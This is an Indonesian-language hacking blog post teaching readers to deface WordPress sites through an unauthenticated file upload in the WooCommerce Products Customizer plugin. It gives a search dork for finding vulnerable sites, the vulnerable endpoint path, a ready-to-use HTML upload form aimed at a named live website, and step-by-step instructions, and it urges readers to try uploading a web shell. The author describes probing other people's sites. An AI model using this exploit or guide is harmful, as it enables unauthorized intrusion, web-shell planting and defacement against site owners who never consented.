Cara Deface WP Plugins WooCommerce Products Customizer Fileupload
Yak kali ini ane akan mengshare Tutorial "Cara Deface WP Plugins WooCommerce Products Customizer Fileupload"
sebenarnya nih bukan deface ! atau cuman bisa upload gambar ! tpi gk thu juga kan , cobain aja pas bisa upload shell
Tadi ane barusan aja muter muter di web orang , nah pas ane bukan foldernya woocommerce-products-customizer . tiba tiba blank ane coba coba mau :D
Tpi pas itu ane coba upload shell gk mau , mungkin di web lain bisa :D. Bisa bisa neh Trik baru :D
HTML Vroh : <form method="POST" action="http://test.jacketman.net/wp-content/plugins/woocommerce-products-customizer/jquery_calls.php"
enctype="multipart/form-data"><input type="file" name="userfile"/><button>Croot Punyamu</button>
</form>
Yang warna biru ganti webnya :D
Dorknya Guyss :
inurl:/wp-content/plugins/woocommerce-products-customizer/
Exploit nya guys : /wp-content/plugins/woocommerce-products-customizer/jquery_calls.php
Tutorial :
1.Cari web dari dork yang udeh mimin siapkan , buka web tersebut . masukan exploit , jika Gambarnya Blank berarti Vuln :D
2.Kemudian buka HTML Exploit nya tadi , kemudian cari file .jpg atau terserah lah
3.Jika berhasil maka akan muncul seperti dibawah ini
4.Filenya akan berada di http://test.jacketman.net//wp-content//uploads//57f9e15a25804.jpg
5.Jika gk berhasil , mungkin muncul nya cuman tulisan :D
6.Enjoy
Trik Dari Mastah Ane : Mr.D3c0d3r #98 + 5uSu S4p1
-=- THANKS FOR READING :D -=-
Post a Comment
Rules :
1.Komentar yang baik,sopan, dan jelas
2.Jangan spam -__-
3.Jika ada problem dari postingnya, koment :3